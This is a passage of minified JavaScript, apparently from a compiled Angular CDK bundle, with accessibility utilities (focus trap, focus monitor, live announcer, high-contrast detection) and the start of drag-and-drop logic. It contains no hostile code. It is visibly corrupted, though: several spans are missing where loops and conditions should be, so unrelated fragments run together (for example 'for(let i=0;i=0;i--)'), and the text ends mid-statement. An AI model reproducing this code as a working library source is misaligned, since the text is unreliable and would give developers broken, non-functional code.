t.getClientRects&&t.getClientRects().length)}(e)&&"visible"===getComputedStyle(e).visibility}isTabbable(e){if(!this._platform.isBrowser)return!1;const i=function Gfe(t){try{return t.frameElement}catch(a){return null}}(function epe(t){return t.ownerDocument&&t.ownerDocument.defaultView||window}(e));if(i&&(-1===Uz(i)||!this.isVisible(i)))return!1;let n=e.nodeName.toLowerCase(),r=Uz(e);return e.hasAttribute("contenteditable")?-1!==r:!("iframe"===n||"object"===n||this._platform.WEBKIT&&this._platform.IOS&&!function Jfe(t){let a=t.nodeName.toLowerCase(),e="input"===a&&t.type;return"text"===e||"password"===e||"select"===a||"textarea"===a}(e))&&("audio"===n?!!e.hasAttribute("controls")&&-1!==r:"video"===n?-1!==r&&(null!==r||this._platform.FIREFOX||e.hasAttribute("controls")):e.tabIndex>=0)}isFocusable(e,i){return function Zfe(t){return!function $fe(t){return function Xfe(t){return"input"==t.nodeName.toLowerCase()}(t)&&"hidden"==t.type}(t)&&(function Qfe(t){let a=t.nodeName.toLowerCase();return"input"===a||"select"===a||"button"===a||"textarea"===a}(t)||function Kfe(t){return function Yfe(t){return"a"==t.nodeName.toLowerCase()}(t)&&t.hasAttribute("href")}(t)||t.hasAttribute("contenteditable")||Hz(t))}(e)&&!this.isDisabled(e)&&((null==i?void 0:i.ignoreVisibility)||this.isVisible(e))}}return t.\u0275fac=function(e){return new(e||t)(At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Hz(t){if(!t.hasAttribute("tabindex")||void 0===t.tabIndex)return!1;let a=t.getAttribute("tabindex");return!(!a||isNaN(parseInt(a,10)))}function Uz(t){if(!Hz(t))return null;const a=parseInt(t.getAttribute("tabindex")||"",10);return isNaN(a)?-1:a}class tpe{constructor(a,e,i,n,r=!1){this._element=a,this._checker=e,this._ngZone=i,this._document=n,this._hasAttached=!1,this.startAnchorListener=()=>this.focusLastTabbableElement(),this.endAnchorListener=()=>this.focusFirstTabbableElement(),this._enabled=!0,r||this.attachAnchors()}get enabled(){return this._enabled}set enabled(a){this._enabled=a,this._startAnchor&&this._endAnchor&&(this._toggleAnchorTabIndex(a,this._startAnchor),this._toggleAnchorTabIndex(a,this._endAnchor))}destroy(){const a=this._startAnchor,e=this._endAnchor;a&&(a.removeEventListener("focus",this.startAnchorListener),a.remove()),e&&(e.removeEventListener("focus",this.endAnchorListener),e.remove()),this._startAnchor=this._endAnchor=null,this._hasAttached=!1}attachAnchors(){return!!this._hasAttached||(this._ngZone.runOutsideAngular(()=>{this._startAnchor||(this._startAnchor=this._createAnchor(),this._startAnchor.addEventListener("focus",this.startAnchorListener)),this._endAnchor||(this._endAnchor=this._createAnchor(),this._endAnchor.addEventListener("focus",this.endAnchorListener))}),this._element.parentNode&&(this._element.parentNode.insertBefore(this._startAnchor,this._element),this._element.parentNode.insertBefore(this._endAnchor,this._element.nextSibling),this._hasAttached=!0),this._hasAttached)}focusInitialElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusInitialElement(a)))})}focusFirstTabbableElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusFirstTabbableElement(a)))})}focusLastTabbableElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusLastTabbableElement(a)))})}_getRegionBoundary(a){const e=this._element.querySelectorAll(`[cdk-focus-region-${a}], [cdkFocusRegion${a}], [cdk-focus-${a}]`);return"start"==a?e.length?e[0]:this._getFirstTabbableElement(this._element):e.length?e[e.length-1]:this._getLastTabbableElement(this._element)}focusInitialElement(a){const e=this._element.querySelector("[cdk-focus-initial], [cdkFocusInitial]");if(e){if(!this._checker.isFocusable(e)){const i=this._getFirstTabbableElement(e);return null==i||i.focus(a),!!i}return e.focus(a),!0}return this.focusFirstTabbableElement(a)}focusFirstTabbableElement(a){const e=this._getRegionBoundary("start");return e&&e.focus(a),!!e}focusLastTabbableElement(a){const e=this._getRegionBoundary("end");return e&&e.focus(a),!!e}hasAttached(){return this._hasAttached}_getFirstTabbableElement(a){if(this._checker.isFocusable(a)&&this._checker.isTabbable(a))return a;const e=a.children;for(let i=0;i=0;i--){const n=e[i].nodeType===this._document.ELEMENT_NODE?this._getLastTabbableElement(e[i]):null;if(n)return n}return null}_createAnchor(){const a=this._document.createElement("div");return this._toggleAnchorTabIndex(this._enabled,a),a.classList.add("cdk-visually-hidden"),a.classList.add("cdk-focus-trap-anchor"),a.setAttribute("aria-hidden","true"),a}_toggleAnchorTabIndex(a,e){a?e.setAttribute("tabindex","0"):e.removeAttribute("tabindex")}toggleAnchors(a){this._startAnchor&&this._endAnchor&&(this._toggleAnchorTabIndex(a,this._startAnchor),this._toggleAnchorTabIndex(a,this._endAnchor))}_executeOnStable(a){this._ngZone.isStable?a():this._ngZone.onStable.pipe(Cn(1)).subscribe(a)}}let z3=(()=>{class t{constructor(e,i,n){this._checker=e,this._ngZone=i,this._document=n}create(e,i=!1){return new tpe(e,this._checker,this._ngZone,this._document,i)}}return t.\u0275fac=function(e){return new(e||t)(At(Ky),At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function W3(t){return 0===t.buttons||0===t.offsetX&&0===t.offsetY}function F3(t){const a=t.touches&&t.touches[0]||t.changedTouches&&t.changedTouches[0];return!(!a||-1!==a.identifier||null!=a.radiusX&&1!==a.radiusX||null!=a.radiusY&&1!==a.radiusY)}const ipe=new ni("cdk-input-modality-detector-options"),ape={ignoreKeys:[18,17,224,91,16]},z1=ym({passive:!0,capture:!0});let npe=(()=>{class t{constructor(e,i,n,r){this._platform=e,this._mostRecentTarget=null,this._modality=new zs(null),this._lastTouchMs=0,this._onKeydown=c=>{var d,T;null!==(T=null===(d=this._options)||void 0===d?void 0:d.ignoreKeys)&&void 0!==T&&T.some(k=>k===c.keyCode)||(this._modality.next("keyboard"),this._mostRecentTarget=Id(c))},this._onMousedown=c=>{Date.now()-this._lastTouchMs<650||(this._modality.next(W3(c)?"keyboard":"mouse"),this._mostRecentTarget=Id(c))},this._onTouchstart=c=>{F3(c)?this._modality.next("keyboard"):(this._lastTouchMs=Date.now(),this._modality.next("touch"),this._mostRecentTarget=Id(c))},this._options=Object.assign(Object.assign({},ape),r),this.modalityDetected=this._modality.pipe(Sw(1)),this.modalityChanged=this.modalityDetected.pipe(Bh()),e.isBrowser&&i.runOutsideAngular(()=>{n.addEventListener("keydown",this._onKeydown,z1),n.addEventListener("mousedown",this._onMousedown,z1),n.addEventListener("touchstart",this._onTouchstart,z1)})}get mostRecentModality(){return this._modality.value}ngOnDestroy(){this._modality.complete(),this._platform.isBrowser&&(document.removeEventListener("keydown",this._onKeydown,z1),document.removeEventListener("mousedown",this._onMousedown,z1),document.removeEventListener("touchstart",this._onTouchstart,z1))}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(qi),At(ga),At(ipe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const ope=new ni("liveAnnouncerElement",{providedIn:"root",factory:function rpe(){return null}}),spe=new ni("LIVE_ANNOUNCER_DEFAULT_OPTIONS");let Nw=(()=>{class t{constructor(e,i,n,r){this._ngZone=i,this._defaultOptions=r,this._document=n,this._liveElement=e||this._createLiveElement()}announce(e,...i){const n=this._defaultOptions;let r,c;return 1===i.length&&"number"==typeof i[0]?c=i[0]:[r,c]=i,this.clear(),clearTimeout(this._previousTimeout),r||(r=n&&n.politeness?n.politeness:"polite"),null==c&&n&&(c=n.duration),this._liveElement.setAttribute("aria-live",r),this._ngZone.runOutsideAngular(()=>(this._currentPromise||(this._currentPromise=new Promise(d=>this._currentResolve=d)),clearTimeout(this._previousTimeout),this._previousTimeout=setTimeout(()=>{this._liveElement.textContent=e,"number"==typeof c&&(this._previousTimeout=setTimeout(()=>this.clear(),c)),this._currentResolve(),this._currentPromise=this._currentResolve=void 0},100),this._currentPromise))}clear(){this._liveElement&&(this._liveElement.textContent="")}ngOnDestroy(){var e,i;clearTimeout(this._previousTimeout),null===(e=this._liveElement)||void 0===e||e.remove(),this._liveElement=null,null===(i=this._currentResolve)||void 0===i||i.call(this),this._currentPromise=this._currentResolve=void 0}_createLiveElement(){const e="cdk-live-announcer-element",i=this._document.getElementsByClassName(e),n=this._document.createElement("div");for(let r=0;r{class t{constructor(e,i,n,r,c){this._ngZone=e,this._platform=i,this._inputModalityDetector=n,this._origin=null,this._windowFocused=!1,this._originFromTouchInteraction=!1,this._elementInfo=new Map,this._monitoredElementCount=0,this._rootNodeFocusListenerCount=new Map,this._windowFocusListener=()=>{this._windowFocused=!0,this._windowFocusTimeoutId=window.setTimeout(()=>this._windowFocused=!1)},this._stopInputModalityDetector=new J,this._rootNodeFocusAndBlurListener=d=>{for(let k=Id(d);k;k=k.parentElement)"focus"===d.type?this._onFocus(d,k):this._onBlur(d,k)},this._document=r,this._detectionMode=(null==c?void 0:c.detectionMode)||0}monitor(e,i=!1){const n=Gr(e);if(!this._platform.isBrowser||1!==n.nodeType)return Bi(null);const r=_3(n)||this._getDocument(),c=this._elementInfo.get(n);if(c)return i&&(c.checkChildren=!0),c.subject;const d={checkChildren:i,subject:new J,rootNode:r};return this._elementInfo.set(n,d),this._registerGlobalListeners(d),d.subject}stopMonitoring(e){const i=Gr(e),n=this._elementInfo.get(i);n&&(n.subject.complete(),this._setClasses(i),this._elementInfo.delete(i),this._removeGlobalListeners(n))}focusVia(e,i,n){const r=Gr(e);r===this._getDocument().activeElement?this._getClosestElementsInfo(r).forEach(([d,T])=>this._originChanged(d,i,T)):(this._setOrigin(i),"function"==typeof r.focus&&r.focus(n))}ngOnDestroy(){this._elementInfo.forEach((e,i)=>this.stopMonitoring(i))}_getDocument(){return this._document||document}_getWindow(){return this._getDocument().defaultView||window}_getFocusOrigin(e){return this._origin?this._originFromTouchInteraction?this._shouldBeAttributedToTouch(e)?"touch":"program":this._origin:this._windowFocused&&this._lastFocusOrigin?this._lastFocusOrigin:e&&this._isLastInteractionFromInputLabel(e)?"mouse":"program"}_shouldBeAttributedToTouch(e){return 1===this._detectionMode||!(null==e||!e.contains(this._inputModalityDetector._mostRecentTarget))}_setClasses(e,i){e.classList.toggle("cdk-focused",!!i),e.classList.toggle("cdk-touch-focused","touch"===i),e.classList.toggle("cdk-keyboard-focused","keyboard"===i),e.classList.toggle("cdk-mouse-focused","mouse"===i),e.classList.toggle("cdk-program-focused","program"===i)}_setOrigin(e,i=!1){this._ngZone.runOutsideAngular(()=>{this._origin=e,this._originFromTouchInteraction="touch"===e&&i,0===this._detectionMode&&(clearTimeout(this._originTimeoutId),this._originTimeoutId=setTimeout(()=>this._origin=null,this._originFromTouchInteraction?650:1))})}_onFocus(e,i){const n=this._elementInfo.get(i),r=Id(e);!n||!n.checkChildren&&i!==r||this._originChanged(i,this._getFocusOrigin(r),n)}_onBlur(e,i){const n=this._elementInfo.get(i);!n||n.checkChildren&&e.relatedTarget instanceof Node&&i.contains(e.relatedTarget)||(this._setClasses(i),this._emitOrigin(n,null))}_emitOrigin(e,i){e.subject.observers.length&&this._ngZone.run(()=>e.subject.next(i))}_registerGlobalListeners(e){if(!this._platform.isBrowser)return;const i=e.rootNode,n=this._rootNodeFocusListenerCount.get(i)||0;n||this._ngZone.runOutsideAngular(()=>{i.addEventListener("focus",this._rootNodeFocusAndBlurListener,V3),i.addEventListener("blur",this._rootNodeFocusAndBlurListener,V3)}),this._rootNodeFocusListenerCount.set(i,n+1),1==++this._monitoredElementCount&&(this._ngZone.runOutsideAngular(()=>{this._getWindow().addEventListener("focus",this._windowFocusListener)}),this._inputModalityDetector.modalityDetected.pipe(ea(this._stopInputModalityDetector)).subscribe(r=>{this._setOrigin(r,!0)}))}_removeGlobalListeners(e){const i=e.rootNode;if(this._rootNodeFocusListenerCount.has(i)){const n=this._rootNodeFocusListenerCount.get(i);n>1?this._rootNodeFocusListenerCount.set(i,n-1):(i.removeEventListener("focus",this._rootNodeFocusAndBlurListener,V3),i.removeEventListener("blur",this._rootNodeFocusAndBlurListener,V3),this._rootNodeFocusListenerCount.delete(i))}--this._monitoredElementCount||(this._getWindow().removeEventListener("focus",this._windowFocusListener),this._stopInputModalityDetector.next(),clearTimeout(this._windowFocusTimeoutId),clearTimeout(this._originTimeoutId))}_originChanged(e,i,n){this._setClasses(e,i),this._emitOrigin(n,i),this._lastFocusOrigin=i}_getClosestElementsInfo(e){const i=[];return this._elementInfo.forEach((n,r)=>{(r===e||n.checkChildren&&r.contains(e))&&i.push([r,n])}),i}_isLastInteractionFromInputLabel(e){const{_mostRecentTarget:i,mostRecentModality:n}=this._inputModalityDetector;if("mouse"!==n||!i||i===e||"INPUT"!==e.nodeName&&"TEXTAREA"!==e.nodeName||e.disabled)return!1;const r=e.labels;if(r)for(let c=0;c{class t{constructor(e,i){this._elementRef=e,this._focusMonitor=i,this._focusOrigin=null,this.cdkFocusChange=new Tt}get focusOrigin(){return this._focusOrigin}ngAfterViewInit(){const e=this._elementRef.nativeElement;this._monitorSubscription=this._focusMonitor.monitor(e,1===e.nodeType&&e.hasAttribute("cdkMonitorSubtreeFocus")).subscribe(i=>{this._focusOrigin=i,this.cdkFocusChange.emit(i)})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._monitorSubscription&&this._monitorSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js))},t.\u0275dir=Ot({type:t,selectors:[["","cdkMonitorElementFocus",""],["","cdkMonitorSubtreeFocus",""]],outputs:{cdkFocusChange:"cdkFocusChange"},exportAs:["cdkMonitorFocus"]}),t})();const Gz="cdk-high-contrast-black-on-white",jz="cdk-high-contrast-white-on-black",Lw="cdk-high-contrast-active";let Qz=(()=>{class t{constructor(e,i){this._platform=e,this._document=i,this._breakpointSubscription=Po(O3).observe("(forced-colors: active)").subscribe(()=>{this._hasCheckedHighContrastMode&&(this._hasCheckedHighContrastMode=!1,this._applyBodyHighContrastModeCssClasses())})}getHighContrastMode(){if(!this._platform.isBrowser)return 0;const e=this._document.createElement("div");e.style.backgroundColor="rgb(1,2,3)",e.style.position="absolute",this._document.body.appendChild(e);const i=this._document.defaultView||window,n=i&&i.getComputedStyle?i.getComputedStyle(e):null,r=(n&&n.backgroundColor||"").replace(/ /g,"");switch(e.remove(),r){case"rgb(0,0,0)":case"rgb(45,50,54)":case"rgb(32,32,32)":return 2;case"rgb(255,255,255)":case"rgb(255,250,239)":return 1}return 0}ngOnDestroy(){this._breakpointSubscription.unsubscribe()}_applyBodyHighContrastModeCssClasses(){if(!this._hasCheckedHighContrastMode&&this._platform.isBrowser&&this._document.body){const e=this._document.body.classList;e.remove(Lw,Gz,jz),this._hasCheckedHighContrastMode=!0;const i=this.getHighContrastMode();1===i?e.add(Lw,Gz):2===i&&e.add(Lw,jz)}}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Xy=(()=>{class t{constructor(e){e._applyBodyHighContrastModeCssClasses()}}return t.\u0275fac=function(e){return new(e||t)(At(Qz))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[$y]}),t})();function $z(t=0,a=Vy){return t<0&&(t=0),M3(t,t,a)}function zw(t,a,e){for(let i in a)if(a.hasOwnProperty(i)){const n=a[i];n?t.setProperty(i,n,null!=e&&e.has(i)?"important":""):t.removeProperty(i)}return t}function W1(t,a){const e=a?"":"none";zw(t.style,{"touch-action":a?"":"none","-webkit-user-drag":a?"":"none","-webkit-tap-highlight-color":a?"":"transparent","user-select":e,"-ms-user-select":e,"-webkit-user-select":e,"-moz-user-select":e})}function Kz(t,a,e){zw(t.style,{position:a?"":"fixed",top:a?"":"0",opacity:a?"":"0",left:a?"":"-999em"},e)}function B3(t,a){return a&&"none"!=a?t+" "+a:t}function Xz(t){const a=t.toLowerCase().indexOf("ms")>-1?1:1e3;return parseFloat(t)*a}function Ww(t,a){return t.getPropertyValue(a).split(",").map(i=>i.trim())}function Fw(t){const a=t.getBoundingClientRect();return{top:a.top,right:a.right,bottom:a.bottom,left:a.left,width:a.width,height:a.height,x:a.x,y:a.y}}function Vw(t,a,e){const{top:i,bottom:n,left:r,right:c}=t;return e>=i&&e<=n&&a>=r&&a<=c}function Yy(t,a,e){t.top+=a,t.bottom=t.top+t.height,t.left+=e,t.right=t.left+t.width}function Yz(t,a,e,i){const{top:n,right:r,bottom:c,left:d,width:T,height:k}=t,q=T*a,Y=k*a;return i>n-Y&&id-q&&e{this.positions.set(e,{scrollPosition:{top:e.scrollTop,left:e.scrollLeft},clientRect:Fw(e)})})}handleScroll(a){const e=Id(a),i=this.positions.get(e);if(!i)return null;const n=i.scrollPosition;let r,c;if(e===this._document){const k=this.getViewportScrollPosition();r=k.top,c=k.left}else r=e.scrollTop,c=e.scrollLeft;const d=n.top-r,T=n.left-c;return this.positions.forEach((k,q)=>{k.clientRect&&e!==q&&e.contains(q)&&Yy(k.clientRect,d,T)}),n.top=r,n.left=c,{top:d,left:T}}getViewportScrollPosition(){return{top:window.scrollY,left:window.scrollX}}}function Zz(t){const a=t.cloneNode(!0),e=a.querySelectorAll("[id]"),i=t.nodeName.toLowerCase();a.removeAttribute("id");for(let n=0;n{if(this.beforeStarted.next(),this._handles.length){const T=this._getTargetHandle(d);T&&!this._disabledHandles.has(T)&&!this.disabled&&this._initializeDragSequence(T,d)}else this.disabled||this._initializeDragSequence(this._rootElement,d)},this._pointerMove=d=>{const T=this._getPointerPositionOnPage(d);if(!this._hasStartedDragging){if(Math.abs(T.x-this._pickupPositionOnPage.x)+Math.abs(T.y-this._pickupPositionOnPage.y)>=this._config.dragStartThreshold){const pe=Date.now()>=this._dragStartTime+this._getDragStartDelay(d),Re=this._dropContainer;if(!pe)return void this._endDragSequence(d);(!Re||!Re.isDragging()&&!Re.isReceiving())&&(d.preventDefault(),this._hasStartedDragging=!0,this._ngZone.run(()=>this._startDragSequence(d)))}return}d.preventDefault();const k=this._getConstrainedPointerPosition(T);if(this._hasMoved=!0,this._lastKnownPointerPosition=T,this._updatePointerDirectionDelta(k),this._dropContainer)this._updateActiveDropContainer(k,T);else{const q=this.constrainPosition?this._initialClientRect:this._pickupPositionOnPage,Y=this._activeTransform;Y.x=k.x-q.x+this._passiveTransform.x,Y.y=k.y-q.y+this._passiveTransform.y,this._applyRootElementTransform(Y.x,Y.y)}this._moveEvents.observers.length&&this._ngZone.run(()=>{this._moveEvents.next({source:this,pointerPosition:k,event:d,distance:this._getDragDistance(k),delta:this._pointerDirectionDelta})})},this._pointerUp=d=>{this._endDragSequence(d)},this._nativeDragStart=d=>{if(this._handles.length){const T=this._getTargetHandle(d);T&&!this._disabledHandles.has(T)&&!this.disabled&&d.preventDefault()}else this.disabled||d.preventDefault()},this.withRootElement(a).withParent(e.parentDragRef||null),this._parentPositions=new Jz(i),c.registerDragItem(this)}get disabled(){return this._disabled||!(!this._dropContainer||!this._dropContainer.disabled)}set disabled(a){const e=wi(a);e!==this._disabled&&(this._disabled=e,this._toggleNativeDragInteractions(),this._handles.forEach(i=>W1(i,e)))}getPlaceholderElement(){return this._placeholder}getRootElement(){return this._rootElement}getVisibleElement(){return this.isDragging()?this.getPlaceholderElement():this.getRootElement()}withHandles(a){this._handles=a.map(i=>Gr(i)),this._handles.forEach(i=>W1(i,this.disabled)),this._toggleNativeDragInteractions();const e=new Set;return this._disabledHandles.forEach(i=>{this._handles.indexOf(i)>-1&&e.add(i)}),this._disabledHandles=e,this}withPreviewTemplate(a){return this._previewTemplate=a,this}withPlaceholderTemplate(a){return this._placeholderTemplate=a,this}withRootElement(a){const e=Gr(a);return e!==this._rootElement&&(this._rootElement&&this._removeRootElementListeners(this._rootElement),this._ngZone.runOutsideAngular(()=>{e.addEventListener("mousedown",this._pointerDown,H3),e.addEventListener("touchstart",this._pointerDown,aW),e.addEventListener("dragstart",this._nativeDragStart,H3)}),this._initialTransform=void 0,this._rootElement=e),"undefined"!=typeof SVGElement&&this._rootElement instanceof SVGElement&&(this._ownerSVGElement=this._rootElement.ownerSVGElement),this}withBoundaryElement(a){return this._boundaryElement=a?Gr(a):null,this._resizeSubscription.unsubscribe(),a&&(this._resizeSubscription=this._viewportRuler.change(10).subscribe(()=>this._containInsideBoundaryOnResize())),this}withParent(a){return this._parentDragRef=a,this}dispose(){var a,e;this._removeRootElementListeners(this._rootElement),this.isDragging()&&(null===(a=this._rootElement)||void 0===a||a.remove()),null===(e=this._anchor)||void 0===e||e.remove(),this._destroyPreview(),this._destroyPlaceholder(),this._dragDropRegistry.removeDragItem(this),this._removeSubscriptions(),this.beforeStarted.complete(),this.started.complete(),this.released.complete(),this.ended.complete(),this.entered.complete(),this.exited.complete(),this.dropped.complete(),this._moveEvents.complete(),this._handles=[],this._disabledHandles.clear(),this._dropContainer=void 0,this._resizeSubscription.unsubscribe(),this._parentPositions.clear(),this._boundaryElement=this._rootElement=this._ownerSVGElement=this._placeholderTemplate=this._previewTemplate=this._anchor=this._parentDragRef=null}isDragging(){return this._hasStartedDragging&&this._dragDropRegistry.isDragging(this)}reset(){this._rootElement.style.transform=this._initialTransform||"",this._activeTransform={x:0,y:0},this._passiveTransform={x:0,y:0}}disableHandle(a){!this._disabledHandles.has(a)&&this._handles.indexOf(a)>-1&&(this._disabledHandles.add(a),W1(a,!0))}enableHandle(a){this._disabledHandles.has(a)&&(this._disabledHandles.delete(a),W1(a,this.disabled))}withDirection(a){return this._direction=a,this}_withDropContainer(a){this._dropContainer=a}getFreeDragPosition(){const a=this.isDragging()?this._activeTransform:this._passiveTransform;return{x:a.x,y:a.y}}setFreeDragPosition(a){return this._activeTransform={x:0,y:0},this._passiveTransform.x=a.x,this._passiveTransform.y=a.y,this._dropContainer||this._applyRootElementTransform(a.x,a.y),this}withPreviewContainer(a){return this._previewContainer=a,this}_sortFromLastPointerPosition(){const a=this._lastKnownPointerPosition;a&&this._dropContainer&&this._updateActiveDropContainer(this._getConstrainedPointerPosition(a),a)}_removeSubscriptions(){this._pointerMoveSubscription.unsubscribe(),this._pointerUpSubscription.unsubscribe(),this._scrollSubscription.unsubscribe()}_destroyPreview(){var a,e;null===(a=this._preview)||void 0===a||a.remove(),null===(e=this._previewRef)||void 0===e||e.destroy(),this._preview=this._previewRef=null}_destroyPlaceholder(){var a,e;null===(a=this._placeholder)||void 0===a||a.remove(),null===(e=this._placeholderRef)||void 0===e||e.destroy(),this._placeholder=this._placeholderRef=null}_endDragSequence(a){if(this._dragDropRegistry.isDragging(this)&&(this._removeSubscriptions(),this._dragDropRegistry.stopDragging(this),this._toggleNativeDragInteractions(),this._handles&&(this._rootElement.style.webkitTapHighlightColor=this._rootElementTapHighlight),this._hasStartedDragging))if(this.released.next({source:this,event:a}),this._dropContainer)this._dropContainer._stopScrolling(),this._animatePreviewToPlaceholder().then(()=>{this._cleanupDragArtifacts(a),this._cleanupCachedDimensions(),this._dragDropRegistry.stopDragging(this)});else{this._passiveTransform.x=this._activeTransform.x;const e=this._getPointerPositionOnPage(a);this._passiveTransform.y=this._activeTransform.y,this._ngZone.run(()=>{this.ended.next({source:this,distance:this._getDragDistance(e),dropPoint:e,event:a})}),this._cleanupCachedDimensions(),this._dragDropRegistry.stopDragging(this)}}_startDragSequence(a){Jy(a)&&(this._lastTouchEventTime=Date.now()),this._toggleNativeDragInteractions();const e=this._dropContainer;if(e){const i=this._rootElement,n=i.parentNode,r=this._placeholder=this._createPlaceholderElement(),c=this._anchor=this._anchor||this._document.createComment(""),d=this._getShadowRoot();n.insertBefore(c,i),this._initialTransform=i.style.transform||"",this._preview=this._createPreviewElement(),Kz(i,!1,Bw),this._document.body.appendChild(n.replaceChild(r,i)),this._getPreviewInsertionPoint(n,d).appendChild(this._preview),this.started.next({source:this,event:a}),e.start(),this._initialContainer=e,this._initialIndex=e.getItemIndex(this)}else this.started.next({source:this,event:a}),this._initialContainer=this._initialIndex=void 0;this._parentPositions.cache(e?e.getScrollableParents():[])}_initializeDragSequence(a,e){this._parentDragRef&&e.stopPropagation();const i=this.isDragging(),n=Jy(e),r=!n&&0!==e.button,c=this._rootElement,d=Id(e),T=!n&&this._lastTouchEventTime&&this._lastTouchEventTime+800>Date.now(),k=n?F3(e):W3(e);if(d&&d.draggable&&"mousedown"===e.type&&e.preventDefault(),i||r||T||k)return;if(this._handles.length){const te=c.style;this._rootElementTapHighlight=te.webkitTapHighlightColor||"",te.webkitTapHighlightColor="transparent"}this._hasStartedDragging=this._hasMoved=!1,this._removeSubscriptions(),this._initialClientRect=this._rootElement.getBoundingClientRect(),this._pointerMoveSubscription=this._dragDropRegistry.pointerMove.subscribe(this._pointerMove),this._pointerUpSubscription=this._dragDropRegistry.pointerUp.subscribe(this._pointerUp),this._scrollSubscription=this._dragDropRegistry.scrolled(this._getShadowRoot()).subscribe(te=>this._updateOnScroll(te)),this._boundaryElement&&(this._boundaryRect=Fw(this._boundaryElement));const q=this._previewTemplate;this._pickupPositionInElement=q&&q.template&&!q.matchSize?{x:0,y:0}:this._getPointerPositionInElement(this._initialClientRect,a,e);const Y=this._pickupPositionOnPage=this._lastKnownPointerPosition=this._getPointerPositionOnPage(e);this._pointerDirectionDelta={x:0,y:0},this._pointerPositionAtLastDirectionChange={x:Y.x,y:Y.y},this._dragStartTime=Date.now(),this._dragDropRegistry.startDragging(this,e)}_cleanupDragArtifacts(a){Kz(this._rootElement,!0,Bw),this._anchor.parentNode.replaceChild(this._rootElement,this._anchor),this._destroyPreview(),this._destroyPlaceholder(),this._initialClientRect=this._boundaryRect=this._previewRect=this._initialTransform=void 0,this._ngZone.run(()=>{const e=this._dropContainer,i=e.getItemIndex(this),n=this._getPointerPositionOnPage(a),r=this._getDragDistance(n),c=e._isOverContainer(n.x,n.y);this.ended.next({source:this,distance:r,dropPoint:n,event:a}),this.dropped.next({item:this,currentIndex:i,previousIndex:this._initialIndex,container:e,previousContainer:this._initialContainer,isPointerOverContainer:c,distance:r,dropPoint:n,event:a}),e.drop(this,i,this._initialIndex,this._initialContainer,c,r,n,a),this._dropContainer=this._initialContainer})}_updateActiveDropContainer({x:a,y:e},{x:i,y:n}){let r=this._initialContainer._getSiblingContainerFromPosition(this,a,e);!r&&this._dropContainer!==this._initialContainer&&this._initialContainer._isOverContainer(a,e)&&(r=this._initialContainer),r&&r!==this._dropContainer&&this._ngZone.run(()=>{this.exited.next({item:this,container:this._dropContainer}),this._dropContainer.exit(this),this._dropContainer=r,this._dropContainer.enter(this,a,e,r===this._initialContainer&&r.sortingDisabled?this._initialIndex:void 0),this.entered.next({item:this,container:r,currentIndex:r.getItemIndex(this)})}),this.isDragging()&&(this._dropContainer._startScrollingIfNecessary(i,n),this._dropContainer._sortItem(this,a,e,this._pointerDirectionDelta),this.constrainPosition?this._applyPreviewTransform(a,e):this._applyPreviewTransform(a-this._pickupPositionInElement.x,e-this._pickupPositionInElement.y))}_createPreviewElement(){const a=this._previewTemplate,e=this.previewClass,i=a?a.template:null;let n;if(i&&a){const r=a.matchSize?this._initialClientRect:null,c=a.viewContainer.createEmbeddedView(i,a.context);c.detectChanges(),n=oW(c,this._document),this._previewRef=c,a.matchSize?rW(n,r):n.style.transform=U3(this._pickupPositionOnPage.x,this._pickupPositionOnPage.y)}else n=Zz(this._rootElement),rW(n,this._initialClientRect),this._initialTransform&&(n.style.transform=this._initialTransform);return zw(n.style,{"pointer-events":"none",margin:"0",position:"fixed",top:"0",left:"0","z-index":`${this._config.zIndex||1e3}`},Bw),W1(n,!1),n.classList.add("cdk-drag-preview"),n.setAttribute("dir",this._direction),e&&(Array.isArray(e)?e.forEach(r=>n.classList.add(r)):n.classList.add(e)),n}_animatePreviewToPlaceholder(){if(!this._hasMoved)return Promise.resolve();const a=this._placeholder.getBoundingClientRect();this._preview.classList.add("cdk-drag-animating"),this._applyPreviewTransform(a.left,a.top);const e=function dpe(t){const a=getComputedStyle(t),e=Ww(a,"transition-property"),i=e.find(d=>"transform"===d||"all"===d);if(!i)return 0;const n=e.indexOf(i),r=Ww(a,"transition-duration"),c=Ww(a,"transition-delay");return Xz(r[n])+Xz(c[n])}(this._preview);return 0===e?Promise.resolve():this._ngZone.runOutsideAngular(()=>new Promise(i=>{const n=c=>{var d;(!c||Id(c)===this._preview&&"transform"===c.propertyName)&&(null===(d=this._preview)||void 0===d||d.removeEventListener("transitionend",n),i(),clearTimeout(r))},r=setTimeout(n,1.5*e);this._preview.addEventListener("transitionend",n)}))}_createPlaceholderElement(){const a=this._placeholderTemplate,e=a?a.template:null;let i;return e?(this._placeholderRef=a.viewContainer.createEmbeddedView(e,a.context),this._placeholderRef.detectChanges(),i=oW(this._placeholderRef,this._document)):i=Zz(this._rootElement),i.style.pointerEvents="none",i.classList.add("cdk-drag-placeholder"),i}_getPointerPositionInElement(a,e,i){const n=e===this._rootElement?null:e,r=n?n.getBoundingClientRect():a,c=Jy(i)?i.targetTouches[0]:i,d=this._getViewportScrollPosition();return{x:r.left-a.left+(c.pageX-r.left-d.left),y:r.top-a.top+(c.pageY-r.top-d.top)}}_getPointerPositionOnPage(a){const e=this._getViewportScrollPosition(),i=Jy(a)?a.touches[0]||a.changedTouches[0]||{pageX:0,pageY:0}:a,n=i.pageX-e.left,r=i.pageY-e.top;if(this._ownerSVGElement){const c=this._ownerSVGElement.getScreenCTM();if(c){const d=this._ownerSVGElement.createSVGPoint();return d.x=n,d.y=r,d.matrixTransform(c.inverse())}}return{x:n,y:r}}_getConstrainedPointerPosition(a){const 